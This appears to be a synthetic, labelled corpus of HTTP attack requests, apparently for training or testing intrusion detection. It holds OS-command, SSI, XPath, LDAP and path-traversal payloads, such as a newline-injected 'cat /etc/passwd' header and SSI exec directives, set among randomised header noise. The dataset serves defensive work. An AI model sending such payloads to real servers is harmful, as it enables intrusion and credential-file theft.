If-Modified-Since: Sun, 16 Dec 07 08:52:46 CET
If-Unmodified-Since: Thu, 16 Aug 07 07:58:36 UTC
If-Match: *
If-None-Match: "aP7PggjhHyeyZy0-kcK"
If-Range: Mon, 13 Apr 09 22:53:13 CET
Max-Forwards: 58
MIME-Version: 8.7
Pragma: fvegee='qi7oaeat'
Proxy-Authorization: NTLM ZnJlRm40cmlHbW90bGVuYXN4a01FSEFhZXJCZW5vYnFvaHI2ZWtsMHZ5
Authorization: resbs Vief9il=autmg
Range: 8423-,-27344,42365-2055
Referer: /eiyniwE/ellle/urcootzE/tzrui.pdf
TE: deflate;q=0.6
Trailer: Host
User-Agent: Mozilla/9.8 (X11; U; SunOS sun4u 6.8; le-bE; rv:4.0.7) Gecko/76851516
UA-CPU: x86
UA-Disp: 580,0173,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 935x997
Via: 1.0 153.167.136.26, 0.4 www.anhETtr.jpeg
Transfer-Encoding: identity
Upgrade: reo7a/2.4, seeqii/1.1, eaejz/1.9, stk1e/6.4, ios/1.7
Warning: 822 66.154.75.56 "93ten2bgostIuran" "Tue, 20 Jan 04 06:16:00 UTC"
X-Forwarded-For: 171.128.179.42
X-Serial-Number: 173254856208744032
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oios9Ns0no=93iuheeizpu3ogd&AlaeswhawyesisG=ukmh&4stotdStit=to+&iIs=24878&1atafoi9ls=41692006&aeoe=88867&wxFzcqoicsea= boot.ini&XttyydafX93E=lrnA@

End - Id: 39090
Start - Id: 42934
class: OsCommanding
GET /eT0/cWT3L3_yoIL1uqfD/3e6qtCd/fw-/poy/eq0lu_OLQom_kUR/sdu1rmkdd0e/t9Oq1kqt5uy/aH@-ffHf3EQqGAOjsj.php4?h8Coefax8xf=856763&h9olrkpnkee=igeni&1mtdnhUmo=54&ta9hbleI4F=datieissiO&hatabewi6t=t7homeMdsnu%3AbinHeeh&YdivBlCLIs=ho7eh&tbApbzai=9223879016&oTtat8mcc=r%3F0na HTTP/1.0
Host: 157.20.120.22
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.6, iso-2022-jp;q=0.6, cp-932;q=0.7
Accept-Encoding: %0a    cat  %0a    /etc/passwd  %0a
Accept-Language: eb-R9r, peengen-N, heo5-trdtt10;q=0.1, Meee9-fevr6etb, oenfp-opnrdlHs
Cache-Control: 6snoe='aUe'
Client-ip: 226.241.221.163
Cookie: tua5utss8aoeraO=p0f;aeid1hNmue3ya=qAlh2eisroOhih
Cookie2: $Version="9"
Date: Tue, 06 Jan 04 13:18:12 GMT
ETag: "bT7Oxs21s533t2Ud"
Expect: sreebpa
If-Modified-Since: Fri, 18 Jan 08 09:24:12 UTC
If-Unmodified-Since: Mon, 28 Jan 08 19:15:33 UTC
If-Match: *
If-Range: Mon, 21 Mar 05 19:32:37 CET
Max-Forwards: 23
MIME-Version: 6.5
Pragma: no-cache
Authorization: ctd0 antow=menhu
Range: 01418-88080,370072-
Referer: http://uEprbl.net/6Moe.zip
Trailer: Range
User-Agent: lrettc
UA-CPU: PowerPC
UA-Disp: 633,7308,8
UA-Color: color32
UA-Pixels: 512x475
Via: 5.0 55.98.52.230, taob/3.4 www.o0o4e.js, 3.0 www.i1bmt.tiff
Transfer-Encoding: gzip
Upgrade: ehi1/8.7, p1nc/9.5
Warning: 513 www.cgtoaN.jpg "orin5gbEs" 

null

End - Id: 42934
Start - Id: 40030
class: SSI
GET /Rnnlti8a1gti9/a86Ucb@uwqygS/ezHF6zC3i@A26hGYcM/6hea6.php4?lhe=cdqyRtiI7ieL9Ar3d&jeolepeetadfl=%3C%21--+++%23exec++++cmd%3D%22%2Fbin%2Fls+-l++++%2Fhome%2FGatt%2FaOtae%22++--%3E HTTP/1.1
Host: 220.45.253.170
Connection: ueaHevm
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: awxe='po'
Client-ip: 160.214.20.200
Cookie: denuaajnNhmzm=insertar1zgdntRNi 7ed;7c0Ua0msifzCji=htE ;in=432253
Cookie2: $Version="286"
Date: Thu, 31 Aug 06 10:19:48 CET
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: ness
From: bic3us@lb0or.fr
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Wed, 05 Apr 06 14:11:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 9.8
Pragma: e='t9e'
Proxy-Authorization: Digest username="tsbedo"
Authorization: NTLM Z2FvdWlhZ3VUcmNpQXNhZWVuYXNlYTBzZXRhbHJuZTNlZQ==
Range: 41683-1312,-3
Referer: http://www.aX8ljtEo.it/enyi.dll
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: oxSoes4rEnFh1yrue
UA-CPU: Sparc
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: compress
Upgrade: 9gTeo/9.5
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40030
Start - Id: 49146
class: XPathInjection
GET /ccsofYaneeDul5veto/iEe9igotaz/ejgKjXsZfI6M/dg-dT9BXxb/h3Ca4hrBSJnD/neeoci/ee06soeoi3la/d9gG5/s4jsgU/boeqgemijdq/s6Jja.cfm?Rnnbtnia4Kctoou=i%3AihonElodtmp&3tdN7d4gsme=ycE1iwb&4stdinz_1binuniond3=a7d0&ne=xteyiTcirnaz&aasnrhflruonjt=nenoe%27+++or++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+i+++%2B++j++%2B++++k++++%2Bl+%2B1%29%5D++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+%27eie%27+%3D+++%27++aT0eyyLa%27++or&i6Gfeso5ssqn=nnrrow HTTP/1.0
Host: 191.31.101.164:06
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, iso-8859-5;q=0.9, windows-1257;q=0.9, iso-8859-9;q=0.3, iso-10646-ucs-2
Accept-Encoding: compress, deflate;q=0.4, compress;q=0.0, deflate
Accept-Language: jgjie9-cht12sn;q=0.9, twAe-ewdohs;q=0.0
Cache-Control: max-age=90214
Client-ip: 97.222.173.73
Cookie: ddmoct=ik1;ta0=63;tseqbhcnl4ac=90802;thttpdexecl=9480575;ynNetto=oIshutdownesmZ2/zilysWcate
Cookie2: $Version="3"
Date: Tue, 05 May 09 07:23:38 UTC
ETag: W/"SMfC7ySiRTzveMxy"
Expect: cnapd=5nhiuzm;etnii
From: lrSasae@aaar.net
If-Modified-Since: Fri, 19 Aug 05 09:57:37 UTC
If-Unmodified-Since: Sun, 13 Jul 08 18:35:32 CET
If-Match: "nX46VXb7gchBvw4ch"
If-None-Match: *
If-Range: Wed, 21 Jan 04 23:03:21 CET
Max-Forwards: 612
MIME-Version: 0.8
Pragma: he=hEe
Proxy-Authorization: NTLM YXJ1eXBlMHdlNUFlY2V0dHNldWU4dGFoZm5laGxzc2RzTWFlYWFhOXR6
Authorization: hhoen nmCrg=ecche
Range: 4916-
Referer: http://www.eeehgdD.org/oprwds/nrrnui/if5T6i/roEsS.jpeg
TE: trailers
Trailer: Host
User-Agent: gtihrktOo (ivi8rB; yuVmqJQ; qdSwBg6; nywnRPjJ; idt0U236)
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: FTP/3.4 212.40.5.91:50280
Transfer-Encoding: sois
Upgrade: oredo/3.8, 9ele/6.1
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49146
Start - Id: 49561
class: XPathInjection
GET /to.1B9-f.tx.6pOD4G/ocE/Npee/54/ndsaao8dea0nensae/ax/8Cel1aeeartb0.mdb?wuuooaatOnseeHA=auia%3C&Isdt0tizi=t%2Fsa%2FlihtE%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D9%5D+++%7C++f%2Fa%2FIr%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D787%5D+++++or++%27ihc%27+++%3D%27&pytncnohsf=gz8Rjzl4Olo&eutsof=nitnullhsgal0der%2Br&ifa=bm&deh=1654&kFvEperlE4Z9a=wflocationclla6 HTTP/1.1
Host: www.kEEyp.it
Connection: iTarhrN8
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.1
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 69.118.218.13
Cookie: srne=5541865;0coarzroeu=rrdcw
Cookie2: $Version="79"
Date: Sun, 04 Jan 04 05:16:30 UTC
ETag: W/"DuBPCDfsenyCYtucp4"
Expect: 100-continue
From: swnuaoul@meaPt.org
If-Modified-Since: Mon, 19 Sep 05 17:29:16 UTC
If-Unmodified-Since: Wed, 19 Jan 05 07:41:43 CET
If-Match: "gSfVBjMCwIxcO2KBCV"
If-None-Match: *
If-Range: Wed, 18 Nov 09 14:40:35 CET
Max-Forwards: 641
MIME-Version: 6.2
Pragma: eidareru='r6mirt6'
Proxy-Authorization: 9a2ilt dswfus7=iredewem
Authorization: NTLM UkFybjRhc3JBNDVhYXhoVWplaUlhYXNvZG90ZHRoZGZoczg=
Range: 5151-28,-30112,9663-34
Referer: /qiy9r2ab/Eemeh/2erunpe/acrXafr/g2asqn.zip
TE: trailers
Trailer: Accept
User-Agent: hthbwYran0LPoksw
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: 8.0 www.fdlOhZh.jpg
Transfer-Encoding: deflate
Upgrade: eoi3/7.7, i8iE0d/8.9
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5637590848505362302
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49561
Start - Id: 49586
class: XPathInjection
GET /ey_-Th9gWSbFee/CNp/aA/noNPA@92tfw73Z/os-WDJdMiW84Y2GE6/ftcixmoceerh/et7uanaglsetxte/syY3d.5m/rhj_yYgU._ZKx/st/hneoscso1dgcnne1ot.swf?6link4LQ=utN8zmnB&f1lfO=ie&heWgyaemhjate=5&uZo=1492679&aihi=rfett3%27++++or+++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28i+++%2B++++j++%2Bk%2B++l%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++%27eeiuuhcu%27%3D++++%27++7licfa%27+or&aqtYsbJn1vphe=669519&oothsea=hnirdoon&SL3L3-=13540589&rt7oaehanicna=+htaccesOat%3Dead&egsptedbe=3769&nrgsn5tr6o4sce=1 HTTP/1.1
Host: 83.107.198.239:03787
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: identity, identity, identity
Accept-Language: wi-wgzeadjz, ebhtrvd-vor;q=0.6, 4hso-Ick0ks;q=0.8, o-cmjeeeCy
Cache-Control: no-store
Client-ip: 63.1.104.115
Cookie: YiK4pQ=8;log9stylerservices5dxBu=i9iYOW
Cookie2: $Version="15"
Date: Sat, 20 Feb 10 09:31:49 UTC
ETag: W/"PmcmEKRs84Qlqdnx_"
Expect: zaa9l=tqnd;iaotty
From: rmya@typuTon9h.uk
If-Modified-Since: Tue, 19 Dec 06 24:33:54 GMT
If-Unmodified-Since: Sat, 19 Nov 05 13:56:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 0.2
Pragma: me=nwShp4tt
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Basic dzljSGVpcTo3bHRl
Range: 124-314534,89-
Referer: /fzanT/Mtealjh0/2ntog5ne/eioalts/rheipcus.nsf
TE: deflate;q=0.8,chunked;q=0.4
Trailer: Accept-Charset
User-Agent: robrhefest (yg@1wV; aws8aw.; ebXI_a; tjfRYxfPpD; iw.KpR)
UA-CPU: PowerPC
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: HTTP/8.1 www.25toA.js, 2.6 www.ohauEowd.shtml, oleiuS/0.0 www.4luoogaY.htm
Transfer-Encoding: compress
Upgrade: plohr/0.2
Warning: 779 www.gAhk.jpeg "5swesRioi5" "Tue, 24 Nov 09 13:38:23 UTC"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49586
Start - Id: 40753
class: SSI
POST /mQpNAqkWU/rFYAv/o_.bRBxMxgU7IrO3j/jnV/8zL0vdneay/loMerr9lekepltwhollo/metaQmiQ2edYC/iS/lierhgtwsnefohtks.cfm? HTTP/1.0
Content-Length: 342
Content-Language: nb,snui
Content-Encoding: gzip
Content-Location: http://oann.fr/hnpwttos/dpyN8eeo.mdb
Content-MD5: aHRhZEVlc3RpaXlhcnRnaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Mar 10 07:40:02 UTC
Host: www.tqset.st
Connection: keep-alive
Accept: text/*, image/*;q=0.1, audio/x-wav
Accept-Charset: iso-2022-kr, shift_jis;q=0.7
Accept-Encoding: identity;q=0.3
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 57.138.29.237
Cookie: mgRf=ghewsrzdinihp2soc;Q886b=i
Date: Wed, 24 Feb 10 03:58:11 GMT
ETag: "BgIhRrT-XK_XKHDxn"
Expect: eNay=ejiiueus;5h5utnem
From: nsnsb@neop.it
If-Modified-Since: Sun, 04 Oct 09 04:14:03 GMT
If-Unmodified-Since: Sat, 04 Dec 04 02:15:14 CET
If-Match: "hqu7Ro2nNNkFVQkQ"
If-None-Match: *
If-Range: Thu, 28 Jul 05 19:01:12 GMT
Max-Forwards: 6
MIME-Version: 8.0
Pragma: 2f=sirrs
Authorization: Basic bmZuamhzOmlFSXMzeg==
Range: 30-86033,50297-483952,510771-833674
Referer: /tiPrgh/h4le/xtie/laohreqm.exe
TE: trailers,gzip,trailers
User-Agent: Towas2khsgntyydlez
UA-CPU: MIPS
UA-Color: color16
Via: srrnkd/9.2 24.42.48.59, 5.4 www.swew.png
Transfer-Encoding: gzip
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
----: ----------------------------------------------

uNvxI7=i6 eh)ttaD86&rlePriaehlNai=h9dYNKvd&penatac9eeginu=ueksetoge&c9EqYxH@ands=726&al5no=374&hEorGe4Oelr=4565&s5JpQeha=<!--    #odbc  connect="lr,ce,0ayt"    statement="select    *  from    o"-->&ell1=s7rwgQ36QW&aon=dunionoqkUpositionaet4rd<54smlm&z.5D6=ewherent&dwms=fG631E&ccd=sey&a0oib0bgtcvd=3aneiiNt7bhttorr

End - Id: 40753
Start - Id: 49957
class: XPathInjection
GET /aisreo.swf?radantao=25079&o3jn=+hhttpsew&hehevl1=oan%2Fnde%2Foenf%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D+++++or+%27rohoa%27+%3D++%27&4sm=4435548&HWO5Erz.rZ=ediai1cleeswout&ems=uc&hresoo6s=rneOtintrcopsr&tfreoz=1&YwRq=56638&aneolcnR=egf%40i+ HTTP/1.0
Host: www.elpw.fr:12897
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic, us-ascii;q=0.5, windows-1257, iso-8859-8-i
Accept-Encoding: 
Accept-Language: ts4d8nf-rgnoae
Cache-Control: min-fresh=0774
Client-ip: 6.57.199.123
Cookie: zi6ibT=91634;THLxtermyVxml=rBhTD3jadR;4e0see=aidahodhbItdobjectok;xzeo=6 4
Cookie2: $Version="9"
Date: Tue, 11 Apr 06 02:13:12 CET
ETag: W/"hQ4l.RD7dOpBmeEgodH"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Sun, 05 Feb 06 04:32:24 CET
If-Unmodified-Since: Tue, 26 Apr 05 14:07:42 UTC
If-Match: "g2sH@cRsy4dKvnb_"
If-None-Match: "zNX.NeWuwJFY-Fw."
If-Range: *
Max-Forwards: 6
MIME-Version: 0.7
Pragma: wj='reioOri'
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 88781-3
Referer: http://eaneooeh.com/pt5eiec/Mraulaoe/es8Eola/u8sLt/omoe.nsf
TE: trailers,deflate;q=0.2,gzip;q=0.8
Trailer: If-Match
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 7.2; eA-d3; rv:4.8.5) Gecko/12634359
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 207x5488
Via: 7.6 www.raIoepx.js:56
Transfer-Encoding: wtev
Upgrade: c6nsO/4.6
Warning: 631 www.reelek.js "sooCrilind" 
X-Forwarded-For: 84.199.213.36
X-Serial-Number: 84157643689
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49957
Start - Id: 49394
class: XPathInjection
GET /aRTORS8UOHmd/tevalfZwindow.openuusr/sV./Ws0MW7/a2QCui0CEwPJ87iViI/oseiaB5tesft.htm?qamlIgtpre4wuta=h3aX&erjm5nOnPo1hee=sy%27+++or+++++1%3C+w%2FV%2Fqxub%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D316%5D++or+++%27aLrEd%27%3D+++%27&dawrdHiqezotRei=eai1t+egharcfp&TApuil=rte+r7t+boot.inior+e&Lkl_lmetaJhtpass=-obn&alllEna2d1tdkUe=eg%7E&eeweencnnb=48705121&9shneeu9yow=ot&mExaecmee=3611&dwtdiv=null&adcuaw=soalntsaet&pmH8iim=eTreU&lbshvn=Ptid8nhfetsq&bhigll=367 HTTP/1.0
Host: 208.13.237.197
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic, hz-gb-2312, big5
Accept-Encoding: gzip, deflate, gzip, identity;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 232.182.22.65
Cookie: rlIfo6=826115652;0go=sLZN;t8si=eixape2t;n:
Cookie2: $Version="461"
Date: Fri, 06 Feb 09 18:32:17 GMT
ETag: W/"YzRB6BmYbIuVoxJQ"
Expect: Mt3seamr
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sun, 06 Feb 05 11:50:56 UTC
If-Unmodified-Since: Tue, 20 Apr 10 21:15:22 CET
If-Match: *
If-None-Match: "03Zn-GPSDqxkw6Q54"
If-Range: *
Max-Forwards: 3237
MIME-Version: 9.6
Pragma: rm9fY='ett'
Proxy-Authorization: NTLM OXV0b2Zqb3NpZXN6ZmkwaUJ0dHVpc25jZG9hb3NmcHQ4dHJybnJzM05wMg==
Authorization: Digest algorithm=MD5-sess
Range: 67912-847396,-254666,29-
Referer: /dou9/tea5ov/ntnoagb/nei1pvi.swf
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: 2itocpa/6.1.2.0.1
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6489x8625
Via: FTP/9.7 18.193.169.245, 9.0 www.Bhew6.tiff:250
Transfer-Encoding: t5jnee
Upgrade: goiteB/8.3
Warning: 199 www.s2an.css "moeybagoex" "Sat, 23 May 09 04:00:06 UTC"
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 9327975536472
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49394
Start - Id: 38769
class: LdapInjection
GET /t1KQ/hegahohe2jina5sodeyo/HvYCdCSqkYY/shyadehetsep/tb9OJZ7HIh0PYUd9/ba4tlsAIa/iC0XZkUTGLOQm/qG6qjWubetweenYNr/tq/ym2HmDLjsmvnXdF.html?yCqEW7.WtN=l%7Cibafnt6te&3me4r=ohXedfsd&mtgtakoveer=iD0f&CnRrsch0iFsi=poE5doneotd&m7ric6lkaesb=5AdpajEstoho&hrltmrc1naEh4=68088&sd7pshsLgw=uZpeZ&gqare=eHw&AO3nc=evgf&QM6tnr=0r%29%28+++%7C%28tN%3D*%29&leqietAwtpar8t=hsebeeDwaael&k8nnweyrns1eisr=1471675&kh090au3esksi=+i&JXMdocumenteL=07369&Htthre=91156 HTTP/1.0
Host: 17.92.92.217
Connection: keep-alive
Accept: text/*, video/*;q=0.3, image/png;q=0.4
Accept-Charset: x-mac-korean
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 88.187.219.127
Cookie: GRa=ate16tibiiss;thGsee8a=(esws;inputpSp3=9536869;na=ssd5eaxo;onaCE=divlqaOsock_streamiiM;wexr214af81=lR
Cookie2: $Version="415"
Date: Sun, 25 Apr 10 12:12:18 CET
ETag: W/"JGyuh3.3J58-vPmC"
Expect: 100-continue
From: pec4ua@ndeAcvp.it
If-Modified-Since: Sun, 21 Mar 10 21:18:27 GMT
If-Unmodified-Since: Fri, 23 Apr 04 05:46:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: edzh nuUs2osn=ijuohy
Range: 7-
Referer: /toniIRDi/t0aiein2/deAc3oRe.exe
TE: trailers,gzip;q=0.1,trailers
Trailer: Accept-Language
User-Agent: 9KU0/9.3.6.1.7
UA-CPU: Sparc
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 8.1 www.ddenNs.png, 8.2 49.250.97.224
Transfer-Encoding: 7ledo6; torge2=rhneoOt
Upgrade: Niea/4.1, tgdad/3.0
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 323337935267147
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38769
Start - Id: 40962
class: SSI
PUT /Pkev.o.jpg? HTTP/1.0
Content-Length: 69
Content-Language: ednEdS,iu,nIgotet
Content-Encoding: compress
Content-Location: http://www.niiep.it/c3aoeil/eSj9l/sotr7/noyip6h/te8njafu.bin
Content-MD5: ZTNlMW9zZHF2ZThhdFR3bA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Aug 08 08:33:52 CET
Host: www.gscpge9d.be
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1257, euc-tw, x-mac-arabic, x-mac-japanese;q=0.6, iso-8859-15;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=64
Cookie: tsr1nsiU=e<patnaclaom@;EqaarsmviwchO=<!-- #odbc     statement    ="select    wsmnn3,   sr, nnmc  from alLx0 order by  6,     311, 9"     -->
Cookie2: $Version="56"
ETag: W/"67ryCATZCNh6dJkr9n"
If-Unmodified-Since: Fri, 16 Apr 10 21:59:14 GMT
If-Match: "7QqGiE.HBtQ5de0F_@7"
Max-Forwards: 8
Pragma: ee7osph=d
Authorization: Digest opaque="thys"
Range: -1
Referer: http://slOo.com/apsbsql/rhzovrnd/Sr3T/as8ztfOw.jsp
Trailer: Expect
User-Agent: Mozilla/4.9 (compatible; Konqueror/8.1; Win 9x; 0sdl9)
UA-Color: color16
Transfer-Encoding: deflate

aunn8eemto7meaw=28591&huwargplmt3ht4=owp-s a$nftpso| n-dqfbgsound

End - Id: 40962
Start - Id: 45199
class: PathTransversal
GET ////? HTTP/1.1
Host: www.eeElhAl.net
Connection: oc8feln
Accept: video/*;q=0.2, text/*
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: deflate
Accept-Language: dl-n;q=0.2, hffstsee-lA;q=0.6, crksfh-oozr;q=0.5, seSe7vlv-mrejdii
Cache-Control: no-store
Client-ip: 200.164.50.206
Cookie: 90Ie=247467;rot8e=468;_jOfPQoptwV=18516;lHl1Ar7h=8602;4Sqonln=33615
Cookie2: $Version="5"
Date: Wed, 20 Oct 04 21:36:50 CET
ETag: W/"5P7OUM98bOhr6Jn"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Mon, 19 Jan 04 07:53:33 CET
If-Unmodified-Since: Sun, 22 Aug 04 24:26:00 CET
If-Match: "w0ZSW-nE_NJWVtv"
If-None-Match: "@VTB6zQDH-AcBM6Qif"
If-Range: *
Max-Forwards: 9631
MIME-Version: 1.6
Pragma: msi7tS=oaesapy
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: Digest nc=8b2D49ef
Range: 706278-,584316-,-67
Referer: http://www.ol1eoean.uk/glnirib.htm
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: Mozilla/0.5 (compatible; z1of; WinNT; Srbevtn)
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: 8.5 45.63.186.86
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 12.15.76.12
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45199
Start - Id: 36315
class: PathTransversal
GET /wv/PMWEWhYGYEW/elr2atIelshAmrl/bJ3eF0fh/aestylci.htm?ti=62&wBiq2=%2F%2C%2C%2C%2Fsuwbs%2FrNw%2Fpasswd HTTP/1.1
Host: www.oOziei.biz
Connection: close
Accept: */*;q=0.9
Accept-Charset: isiri-3342;q=0.9, x-mac-japanese, iso-8859-4, big5, euc-tw
Accept-Encoding: 
Accept-Language: csObt-btpE, eeneye-ntp;q=0.5, e5hiEran-icdma, ntbir-oreo, ntM7pes-lsnAsbrl;q=0.3
Cache-Control: oea=ag
Client-ip: 204.44.253.203
Cookie: fqdelwee=atW_btF6h
Cookie2: $Version="628"
Date: Mon, 17 Jan 05 08:51:31 CET
ETag: W/"XVnSSkhMGncEq258"
Expect: 4soo
From: 5ygo@eiccrasaq.org
If-Modified-Since: Wed, 02 Apr 08 12:47:33 CET
If-Unmodified-Since: Sun, 13 Feb 05 11:42:06 GMT
If-Match: "Ftkxf1q3c9V.rL-7"
If-None-Match: *
If-Range: Sun, 17 Jun 07 01:12:05 CET
Max-Forwards: 72
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: tioya ejsnoe=rrNti
Authorization: Basic YXRmMWllOnNocnRmNG4=
Range: -3
Referer: /irarfAmE/uz1etrTf.fgf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 1.6; ru-tt; rv:1.4.9) Gecko/00288538
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: HTTP/7.3 www.noq5li.htm, FTP/2.7 www.ebelb.tiff, 6.4 www.ehrtqwn.css:858
Transfer-Encoding: identity
Upgrade: saanei/2.6
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36315
Start - Id: 35804
class: XPathInjection
GET /NCDQJG@Bn0@Ng/ofbetctC@8O/hWcA2ufjsUYnWy/o7Ao0maSlHu/tg/n2EdcedpYrErf/pxxF3hJDS/hNqfXZRhv.51OxXif8M/dSrQ/dmMo9Detsnomsa.htm?oette=ej%2B&rbmt=19075&msio=1616052925&TVC23PB05Yi=897887&tnIhieia=Hbocuda%27+or++%28i+%3C+++count%28LC%2Fchild%3A%3Atext%28%29%29++++and+++j+%3C++count%28oe%2Fchild%3A%3Acomment%28%29%29+++++and+k+++++%3C+count%28rwhOr%2Fchild%3A%3A*%29++++%29+++++or++%278g%27+%3D+%27++++i1Cs2u%27+++++or&qSme=A+B+ HTTP/1.1
Host: www.ailet9.ch
Connection: close
Accept: application/*;q=0.8, video/mpeg, audio/*
Accept-Charset: windows-1252, iso-8859-6;q=0.4
Accept-Encoding: 
Accept-Language: ocX-wos03T, tnlscz-nhamot;q=0.9, o4nlif-snihtt;q=0.9, Oqf-uvp;q=0.9
Cache-Control: max-stale
Client-ip: 25.4.155.47
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="52"
Date: Fri, 20 Feb 04 10:01:48 CET
ETag: "LurqXpLgf.Ql2zH"
Expect: lteNH=ieiARts;setA=dgrtRD
From: gH0ez@Sireoah.fr
If-Modified-Since: Wed, 21 May 08 07:23:05 UTC
If-Unmodified-Since: Mon, 30 Aug 04 10:26:00 CET
If-Match: "4EO6.FEb_9HD51M1cGO"
If-None-Match: *
If-Range: Sat, 07 Jul 07 10:04:41 GMT
Max-Forwards: 13
MIME-Version: 9.7
Pragma: egI=eo2sxi
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Range: 205-0247
Referer: /riileSh/oegilbth.php3
TE: gzip,deflate,trailers
Trailer: Expect
User-Agent: 5mggt8a6a/0.5.2.5.0
